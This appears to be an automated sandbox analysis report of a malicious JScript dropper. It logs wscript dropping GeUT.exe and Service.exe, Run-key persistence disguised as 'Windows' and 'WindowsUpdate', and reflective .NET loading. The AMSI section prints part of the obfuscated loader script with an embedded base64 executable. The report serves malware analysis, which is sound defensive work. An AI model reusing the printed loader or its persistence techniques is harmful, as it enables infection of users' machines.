Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: cc.js

Static file information: File size 1729444 > 1048576

Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '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

.NET source code contains potential unpacker

Source: GeUT.exe.0.dr, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: Service.exe.2.dr, Program.cs	.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])

Source: GeUT.exe.0.dr	Static PE information: section name: .text entropy: 7.937538668947789
Source: Service.exe.2.dr	Static PE information: section name: .text entropy: 7.937538668947789

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\GeUT.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File created: C:\Users\user\AppData\Roaming\Service.exe			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Roaming\Service.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
